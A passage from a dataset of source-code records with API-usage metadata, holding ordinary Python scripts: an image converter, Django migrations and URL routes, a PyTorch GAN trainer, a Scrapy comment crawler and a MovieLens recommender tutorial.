"attribute"}, {"api_name": "tornado.web", "line_number": 166, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 180, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 180, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 180, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 196, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 196, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 196, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 205, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 188, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 226, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 226, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 235, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 218, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 256, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 256, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 256, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 266, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 248, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 248, "usage_type": "name"}]} +{"seq_id": "197981845", "text": "import sys\nimport os\nfrom PIL import Image\n\n#grab first and second argument\nimage_folder = sys.argv[1]\noutput_folder = sys.argv[2]\n#check if new/ exists or create one\nif not os.path.exists(output_folder):\n\tos.makedirs(output_folder)\nfor filename in os.listdir(image_folder):\n\timg = Image.open(f'{image_folder}{filename}')\n\tclean_name = os.path.splitext(filename)[0]\n\timg.save(f'{output_folder}{clean_name}.png','png')\n\tprint('all done!')\n\n#loop throu' pokedex and then convert it to png\n#save em to the new folder\n", "sub_path": "image-playground/JPEGtoPNGconverter.py", "file_name": "JPEGtoPNGconverter.py", "file_ext": "py", "file_size_in_byte": 515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "345735526", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AboutMe',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200, verbose_name=b'\\xd0\\xbc\\xd0\\xbe\\xd1\\x91 \\xd0\\xb8\\xd0\\xbc\\xd1\\x8f', blank=True)),\n ('about_me', ckeditor.fields.RichTextField(null=True, verbose_name=b'\\xd0\\xbe\\xd0\\xb1\\xd0\\xbe \\xd0\\xbc\\xd0\\xbd\\xd0\\xb5', blank=True)),\n ('public_date', models.DateTimeField(null=True, blank=True)),\n ],\n options={\n 'db_table': 'salon_about_my',\n },\n ),\n migrations.CreateModel(\n name='CkEditor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200, blank=True)),\n ('text_ck', ckeditor.fields.RichTextField(null=True, blank=True)),\n ],\n options={\n 'db_table': 'test_cseditor',\n },\n ),\n ]\n", "sub_path": "index/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "ckeditor.fields.fields.RichTextField", "line_number": 19, "usage_type": "call"}, {"api_name": "ckeditor.fields.fields", "line_number": 19, "usage_type": "attribute"}, {"api_name": "ckeditor.fields", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "ckeditor.fields.fields.RichTextField", "line_number": 31, "usage_type": "call"}, {"api_name": "ckeditor.fields.fields", "line_number": 31, "usage_type": "attribute"}, {"api_name": "ckeditor.fields", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "344526647", "text": "import torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\n\nfrom epochsviz import Epochsviz\nfrom hist import hist\nfrom load_data import load_data\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n### CONSTANTS\n### CONSTANTS\n### CONSTANTS\nfrom models import train_discriminator, train_generator, Discriminator, Generator\n\nHIST_POINTS = 100\nBATCH_SIZE = 128 # 256\nPADDING = 400 # 2000\nFEATURES = 15\nINP_RAND_SIZE = 512\n\n### CONSTANTS\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"GPU is available\")\nelse:\n device = torch.device(\"cpu\")\n print(\"GPU not available, CPU used\")\n\ndata, max_length = load_data(device=device)\n\n# PADDING = max_length\n\n\n\npadded_data: torch.Tensor = torch.nn.utils.rnn.pad_sequence(data, batch_first=True, ).split(split_size=PADDING, dim=1)[0]\n#padded_data = torch.zeros(size=(len(padded_data), PADDING, FEATURES))\n\n\ndata_train = DataLoader(\n padded_data,\n batch_size=BATCH_SIZE,\n shuffle=True\n)\n\nnum_batches = len(data_train)\n\n\ndef noise(size, device) -> torch.Tensor:\n # Generates a 1-d vector of gaussian sampled random values\n return torch.randn(size, INP_RAND_SIZE).to(device=device)\n\n\ntry:\n gen = torch.load('gen_model_')\nexcept:\n gen = Generator(inp=INP_RAND_SIZE, out_length=PADDING, out_features=FEATURES, device=device) # .to(device=device)\n\ntry:\n dis = torch.load('dis_model_')\nexcept:\n dis = Discriminator(samples=PADDING, features=FEATURES, out=1, device=device) # .to(device=device)\n\n# optimizerd1 = optim.SGD(dis.parameters(), lr=0.001, momentum=0.9)\n# optimizerd2 = optim.SGD(gen.parameters(), lr=0.001, momentum=0.9)\n\nd_optimizer = optim.Adam(dis.parameters(), lr=0.005)\ng_optimizer = optim.Adam(gen.parameters(), lr=0.005)\n\n\ndef mae_loss(input, target):\n return torch.sum((input - target) ** 2)\n\n\nloss = nn.BCELoss()\n\n### TRAINING\n\n# logger = Logger(model_name='GAN', data_name='Pythia')\n\neviz = Epochsviz(title='figure', plot_width=1200, plot_height=600)\n\n\ndef train():\n num_epochs = 200\n\n for epoch in range(num_epochs):\n d_error = 0\n g_error = 0\n fake_data = torch.Tensor()\n real_data = torch.Tensor()\n for n_batch, batch in enumerate(data_train):\n\n print(str(n_batch))\n N = len(batch)\n\n # 1. Train Discriminator\n # real_data = Variable(images_to_vectors(real_batch))\n real_data: torch.Tensor = batch.to(device=device)\n\n # Generate fake data and detach\n # (so gradients are not calculated for generator)\n fake_data: torch.Tensor = gen(noise(N, device=device)).detach()\n\n # Train D\n d_error, d_pred_real, d_pred_fake = train_discriminator(\n dis=dis,\n optimizer=d_optimizer,\n loss=loss,\n real_data=real_data,\n fake_data=fake_data,\n device=device\n )\n\n # 2. Train Generator\n # Generate fake data\n fake_data = gen(noise(N, device=device))\n\n # Train G\n g_error = train_generator(\n dis=dis,\n optimizer=g_optimizer,\n loss=loss,\n fake_data=fake_data,\n device=device\n )\n\n # Log batch error\n # logger.log(d_error, g_error, epoch, n_batch, num_batches)\n\n # Display Progress every few batches\n\n if (n_batch) % 30 == 0:\n print('epoch: ' + str(epoch) + ', ' +\n 'n_batch: ' + str(n_batch) + ', ' +\n 'd_error: ' + str(d_error.item()) + ', ' +\n 'g_error: ' + str(g_error.item())\n )\n\n plt.pause(0.001)\n\n eviz.send_data(epoch, d_error.item(), g_error.item())\n if epoch%10==0:\n torch.save(dis.state_dict(), './dis_model_' + str(epoch))\n torch.save(gen.state_dict(), './gen_model_' + str(epoch))\n\n '''\n print('REAL DATA 11')\n plt.imshow(real_data.cpu()[11, :, :], )\n plt.colorbar()\n plt.show()\n '''\n\n img_smpls_to_shw = 80\n\n print('REAL DATA')\n for i in range(0, real_data.shape[0], 100):\n plt.figure('Real img:' + str(i))\n plt.imshow(real_data[i, :, :].split(split_size=img_smpls_to_shw, dim=0)[0].cpu())\n plt.ion()\n plt.show()\n plt.figure('Real hist:' + str(i))\n plt.hist(real_data[i, :, 6].cpu().flatten(), 100)\n plt.show()\n plt.pause(0.001)\n\n # plt.figure(1)\n # plt.hist(real_data[:, :, 6].detach().cpu().numpy().flatten(), 100)\n\n\n print('FAKE DATA')\n for i in range(0, fake_data.shape[0], 100):\n plt.figure('Fake img:' + str(i))\n plt.imshow(fake_data[i, :, :].split(split_size=img_smpls_to_shw, dim=0)[0].detach().cpu())\n plt.ion()\n plt.show()\n plt.figure('Fake hist:' + str(i))\n plt.hist(fake_data[i, :, 6].detach().cpu().flatten(), 100)\n plt.show()\n\n plt.pause(0.001)\n\n # plt.figure(2)\n # plt.hist(fake_data[:, :, 6].detach().cpu().numpy().flatten(), 100)\n\n\n\n# After the train function\ntorch.cuda.empty_cache()\neviz.start_thread(train_function=train)\n", "sub_path": "event_generator_pytorch/_old_main.py", "file_name": "_old_main.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 30, "usage_type": "call"}, {"api_name": "load_data.load_data", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Generator", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Discriminator", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "epochsviz.Epochsviz", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.train_discriminator", "line_number": 109, "usage_type": "call"}, {"api_name": "models.train_generator", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.cuda.empty_cache", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 192, "usage_type": "attribute"}]} +{"seq_id": "488106862", "text": "# -*- coding: utf-8 -*-\n__author__ = 'AllenCHM'\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nimport json\nimport pymongo\nfrom scrapy import Request\nimport time\nimport re\nfrom bili.settings import MONGOHOST\n\nclass BilibiCommScrapy(BaseSpider):\n name = u'bilibiComm'\n allowed_domains = [u'bilibili.com', ]\n\n def __init__(self):\n self.connectionMongoDB = pymongo.MongoClient(host=MONGOHOST, port=27017)\n self.db = self.connectionMongoDB['bilibili']\n self.doc = self.db[\"avIndex\"]\n self.userInfo = self.db[\"userInfo\"]\n self.comment = self.db[\"comment\"]\n self.userInfoUrl = u'http://space.bilibili.com/ajax/member/GetInfo?mid='\n\n def start_requests(self):\n count = self.doc.count()\n for k in xrange(0,count, 10000):\n tmp = self.doc.find({}, {u'aid': 1}).skip(k).limit(10000)\n for i in tmp:\n url = u'http://api.bilibili.com/feedback?type=jsonp&ver=3&callback=jQuery17202343479166738689_' + str(int(time.time()*1000)) + u'&mode=arc&aid=' + str(i[u'aid']) + u'&pagesize=20&page=1&_=' + str(int(time.time()*1000))\n yield Request(url, callback=self.parse)\n\n def parse(self, response):\n tmp = re.findall('\\((.*)\\)', response.body, re.S)\n page = re.findall('page=(.*?)&', response.url)[0]\n tmp = json.loads(tmp[0])\n if tmp.has_key(u'list'):\n if tmp[u'list']:\n for i in tmp[u'list']:\n self.comment.update_one({u'aid': int(re.findall('aid=(.*?)&', response.url)[0])},\n {u\"$addToSet\": {u\"feedback\": i}}, True)\n if not self.userInfo.find_one({u'mid':str(i[u'mid'])}, {u'_id':1}):\n yield Request(self.userInfoUrl + str(i[u'mid']), callback=self.parseUserInfoJson)\n if int(page)*20 < tmp[u'results']:\n for i in xrange(int(page)+1, (tmp[u'pages']+20-1)/20):\n url = response.url.split(u'&')\n url[-2] = u'page=' + str(i)\n url = u'&'.join(url)\n yield Request(url, callback=self.parse)\n\n def parseUserInfoJson(self, response):\n try:\n tmp = json.loads(response.body)\n if tmp[u'status']:\n self.userInfo.update_one({u'mid': tmp[u'data'][u'mid']}, {u'$set':tmp[u'data']}, True)\n except:\n pass\n\n def closed(self, reason):\n self.connectionMongoDB.close()", "sub_path": "bilibili/bili/bili/spiders/bilicoment.py", "file_name": "bilicoment.py", "file_ext": "py", "file_size_in_byte": 2549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 13, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 18, "usage_type": "call"}, {"api_name": "bili.settings.MONGOHOST", "line_number": 18, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 31, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 34, "usage_type": "call"}, {"api_name": "re.S", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 40, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 43, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "240894616", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom projects.urls import urlpatterns as projects_urls\nfrom users.urls import urlpatterns as users_urls\nfrom workdays.urls import urlpatterns as workdays_urls\n\ncustom_urls = [\n\n # --- Django admin urls ---\n path('admin/', admin.site.urls),\n\n # --- JWT urls ---\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n\n]\n\napi_urls = [\n\n path('projects/', include(projects_urls)),\n path('users/', include(users_urls)),\n path('workdays/', include(workdays_urls)),\n\n]\n\nurlpatterns = [\n\n path(r'api/', include(api_urls)),\n path('', include(custom_urls)),\n\n]\n", "sub_path": "backend/config/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "projects.urls.urlpatterns", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "users.urls.urlpatterns", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 25, "usage_type": "call"}, {"api_name": "workdays.urls.urlpatterns", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "511287962", "text": "#coding=utf-8\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport warnings\nwarnings.filterwarnings('ignore')\nnp.random.seed(1)\n#%matplotlib inline\nplt.style.use('ggplot')\n# data = pd.read_csv('ml-20m/ratings_smaller.csv', index_col=0)\n# movies = pd.read_csv('ml-20m/movies_smaller.csv')\n\ndata = pd.read_csv('ml-latest-small/ratings.csv.gz')\nmovies = pd.read_csv('ml-latest-small/movies.csv.gz')\nmovies = movies.set_index('movieId')[['title', 'genres']] #把movieId列作为索引,取'title', 'genres'两列作为数据\nprint(movies.head())\nprint(data.head())\n# How many users?\n#1 unique()统计list、series中的不同值的个数,返回的是list.\n# 2 nunique()可直接统计dataframe中每列的不同值的个数,也可用于series,但不能用于list.返回的是不同值的个数.\nprint (data.userId.nunique(), 'users')\n\n# How many movies?\nprint (data.movieId.nunique(), 'movies')\n\n# How possible ratings?\nprint (data.userId.nunique() * data.movieId.nunique(), 'possible ratings')\n\n# How many do we have?\nprint (len(data), 'ratings')\nprint (100 * (float(len(data)) / (data.userId.nunique() * data.movieId.nunique())), '% of possible ratings')\n\n# Number of ratings per users\nfig = plt.figure(figsize=(10, 10))#figsize:指定figure的宽和高,单位为英寸;\n#画柱状图 x : (n,) array or sequence of (n,) arrays 这个参数是指定每个bin(箱子)分布的数据,对应x轴bins : 这个参数指定bin(箱子)的个数,也就是总共有几条条状图\n#按照userId分组,data.groupby('userId').apply(lambda x: len(x)).values 返回的是一个list ,每个数值是每个UID的评论个数\nax = plt.hist(data.groupby('userId').apply(lambda x: len(x)).values, bins=50)\nplt.title(\"Number of ratings per user\")\n#plt.show()#jupyter不用此语句,在此需要显示图片\n\n#此图y轴显示的是评论数目是某一数值的用户有多少(在测试中可以看)\n\n\n# Number of ratings per movie\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('movieId').apply(lambda x: len(x)).values, bins=50)\nplt.title('Number of ratings per movie')\n#plt.show()\n#此图y轴显示的是评论数目是某一数值的电影有多少(在测试中可以看)\n\n# Ratings distribution\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.rating.values, bins=5)\nplt.title(\"Distribution of ratings\")\n#plt.show()\n#此图Y轴显示的是评分是某个区间的用户有多少\n\n# Average rating per user\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('userId').rating.mean().values, bins=10)\nplt.title(\"Average rating per user\")\n#plt.show()\n#此图Y轴显示的是平均评分是某个区间的用户有多少\n\n# Average rating per movie\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('movieId').rating.mean().values, bins=10)\nplt.title('Average rating per movie')\n#plt.show()\n#此图Y轴显示的是平均评分是某个区间的电影有多少\n\n# Top Movies\naverage_movie_rating = data.groupby('movieId').mean()#按电影取均值\nprint(average_movie_rating.head())#索引已经变成movieId\n\"\"\"\n userId rating timestamp\nmovieId \n1 335.663793 3.907328 1.079410e+09\n2 338.173913 3.353261 1.074912e+09\n3 299.982759 3.189655 9.449434e+08\n4 342.727273 2.818182 9.638945e+08\n5 284.822581 3.250000 9.855105e+08\n\"\"\"\n\n\ntop_movies = average_movie_rating.sort_values('rating', ascending=False).head(10)\n#pandas中的sort_values()函数原理类似于SQL中的order by,可以将数据集依照某个字段中的数据进行排序,该函数即可根据指定列数据也可根据指定行的数据排序。\n#print top_movies.index.values movie_id [ 465 111387 1757 5003 5007 5037 5042 91007 5056 5090]\n#loc函数:通过行索引 \"Index\" 中的具体值来取行数据(如取\"Index\"为\"A\"的行)\n#concat 按照索引拼接数据 此时是行拼接\ntop =pd.concat([movies.loc[top_movies.index.values],average_movie_rating.loc[top_movies.index.values].rating], axis=1)\n\n#评分差异比较大的电影 **乘方\ncontroversial_movies = data.groupby('movieId').apply(lambda x:len(x)**0.25 * x.std()).sort_values('rating', ascending=False).head(10)\npd.concat([movies.loc[controversial_movies.index.values], average_movie_rating.loc[controversial_movies.index.values].rating], axis=1)\n\n#数据转矩阵\nratings = data[['userId', 'movieId', 'rating']].values\n\n# Shuffle training examples so that movies and users are evenly distributed\nnp.random.shuffle(ratings)\n#参数 axisaxis=0 对每一列进行操作,axis=1 对每一行进行操作,userId从0开始int连续值,movieId从0开始int连续值\nx, y, _ = ratings.max(axis=0)\nn_users=int(x)\nn_items=int(y)\nprint(n_users, n_items)\n#数据集划分\nsplit_ratios = [0, 0.7, 0.85, 1]\nn = len(ratings)#返回矩阵行数\ntrain_ratings, valid_ratings, test_ratings = [ratings[int(n*lo):int(n*up)] for (lo, up) in zip(split_ratios[:-1], split_ratios[1:])]\ndef sample_random_training_index():\n return np.random.randint(0, len(train_ratings))\nx=sample_random_training_index()\nuser, item, rating = train_ratings[x]\nd=train_ratings[:,2]#取训练矩阵第三列的数据出来\nprint(\"test for data\")\nprint(x,user, item, rating )\nprint(len(d),d)\n\"\"\"\n>>>a = [1,2,3]\n>>> b = [4,5,6]\n>>> c = [4,5,6,7,8]\n>>> zipped = zip(a,b) # 打包为元组的列表\n[(1, 4), (2, 5), (3, 6)]\n>>> zip(a,c) # 元素个数与最短的列表一致\n[(1, 4), (2, 5), (3, 6)]\n[0,0.7,0.85]\n[0.7,0.85,1]\n[(0,0.7),(0.7,0.85),(0.85,1)]\n\"\"\"\ngradients = [\"dL_db\", \"dL_dbu\", \"dL_dbv\", \"dL_dU\", \"dL_dV\"]\n\n\nclass Model(object):\n def __init__(self, latent_factors_size, L2_bias=0, L2_emb=0):\n self.model_parameters = []\n self.gradients = []\n for (name, value) in self.initialize_parameters(latent_factors_size):\n setattr(self, name, value)\n self.gradients.append(\"dL_d%s\" % name)\n self.model_parameters.append(name)\n #gradients初始化的结果为[dL_db,dL_du,dL_dv,dL_dU,dL_dV]\n #model_parameters的初始化的结果为[ b,u,v,U ,V ]\n\n # Used to save parameters during the optimization\n def save_parameters(self):\n return [(name, np.copy(getattr(self, name))) for name in self.model_parameters]\n\n # Used to reload the best parameters once the optimization is finished\n def load_parameters(self, parameters):\n for (name, value) in parameters:\n setattr(self, name, value)\n \"\"\"\n 1 >>> class test():\n 2 ... name=\"xiaohua\"\n 3 ... def run(self):\n 4 ... return \"HelloWord\"\n 5 ...\n 6 >>> t=test()\n 7 >>> getattr(t, \"name\") #获取name属性,存在就打印出来。\n 8 'xiaohua'\n\n 1 >>> class test():\n 2 ... name=\"xiaohua\"\n 3 ... def run(self):\n 4 ... return \"HelloWord\"\n 5 ...\n 6 >>> t=test()\n 7 >>> hasattr(t, \"age\") #判断属性是否存在\n 8 False\n 9 >>> setattr(t, \"age\", \"18\") #为属相赋值,并没有返回值\n 10 >>> hasattr(t, \"age\") #属性存在了\n 11 True\n \"\"\"\n # Random embedding generation from normal distribution, given a size and variance\n # 构造初始矩阵,用户矩阵U(n_users + 1)*100 物品矩阵V (n_items + 1)*100\n # 用户偏好矩阵 u 物品偏差v\n def initialize_parameters(self, latent_factors_size=100, std=0.05):\n U = np.random.normal(0., std, size=(n_users + 1, latent_factors_size))\n V = np.random.normal(0., std, size=(n_items + 1, latent_factors_size))\n u = np.zeros(n_users + 1)\n v = np.zeros(n_items + 1)\n return zip((\"b\", \"u\", \"v\", \"U\", \"V\"), (0, u, v, U, V))\n\n # Compute the gradients of the biases and embeddings, given the user-item\n def compute_gradient(self, user_ids, item_ids, ratings):\n res={}\n user_ids = user_ids\n item_ids = item_ids\n predicted_ratings = self.predict(user_ids, item_ids)\n residual = ratings - predicted_ratings\n\n # biases\n dL_db = -2 * residual\n res[\"dL_db\"]=dL_db\n dL_dbu = -2 * residual\n dL_dbv = -2 * residual\n\n # embeddings\n eu = 